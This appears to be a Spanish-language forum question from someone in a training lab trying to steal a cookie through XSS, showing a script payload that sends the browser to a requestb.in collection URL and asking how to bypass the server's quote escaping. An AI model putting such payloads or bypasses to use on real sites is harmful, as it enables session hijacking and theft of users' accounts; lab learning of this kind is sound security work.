Estoy intentando robar una cookie usando XSS en un laboratorio de capacitación. El problema es que el servidor escapa a mis citas y comillas dobles. Así que si quiero usar esta carga útil, por ejemplo:
<script>document.location="http://requestb.in/XXXXXXX"</script>
No se realiza ninguna solicitud GET para " enlace " debido a que '
y "
se escapan. ( '
se convierte en \'
y "
se convierte en '+String.fromCharCode(34)
), por lo que la carga útil se convierte en:
<script>document.location=\'http://requestb.in/XXXXXXX"=\'</script>
O
<script>document.location='+String.fromCharCode(34)+'http://requestb.in/XXXXXXX'+String.fromCharCode(34)+'</script>
Entonces, ¿qué otros medios puede usar uno para realizar un robo de cookies en esas condiciones?
Saludos